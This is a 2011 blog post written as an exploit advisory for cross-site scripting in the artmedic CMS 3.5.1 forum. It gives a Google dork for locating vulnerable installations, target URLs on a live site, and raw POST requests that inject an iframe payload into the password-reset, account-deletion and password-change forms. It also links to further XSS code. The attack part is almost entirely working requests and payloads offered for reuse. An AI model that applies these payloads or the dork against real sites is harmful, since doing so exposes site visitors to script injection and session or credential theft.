joi, 18 august 2011

Cross Site Scripting artmedic CMS 3.5.1 UserForum

# Exploit Title:Cross Site Scripting artmedic CMS 3.5.1 UserForum
# Date: 18.08.2011
# Author: Sony
# Google Dorks: CMS von artmedic webdesign forum
# Software Link:http://www.artmedic-phpscripts.de/
# Version:artmedic CMS 3.5.1


..................................................................

POST METHOD:

1.

http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=passwort

Put in the E-Mailadresse our code : < iframe src="http://xssed.com" > and press button Passwort zusenden.

#request# POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=sendpassword

POST /index.php?page=forumindex&f=2&i=forum_index&fid=sendpassword forum_useremail=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Passwort+zusenden

pics:






2.



http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=abmelden

Put in the Benutzername and Benutzerpasswort our code : < iframe src="http://xssed.com" > and press button..

#request# POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=abmeldenaction

POST /index.php?page=forumindex&f=2&i=forum_index&fid=abmeldenaction forum_username=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&forum_userpasswort=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Benutzer+l%F6schen

pics:





3.



http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=changepass

Put in the Bisheriges Passwort,Neues Passwort and Benutzername our code : < iframe src="http://xssed.com" > and press button..

#request# POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=changepassaction

POST /index.php?page=forumindex&f=2&i=forum_index&fid=changepassaction passold=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&passnew=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&forum_username=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Passwort+%E4ndern

pics:



......................................


Forum comments, guestbook, etc..



XSS Code:

http://codepad.org/xzWJokmo
Publicat de Sony la 06:07
Etichete: ,

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.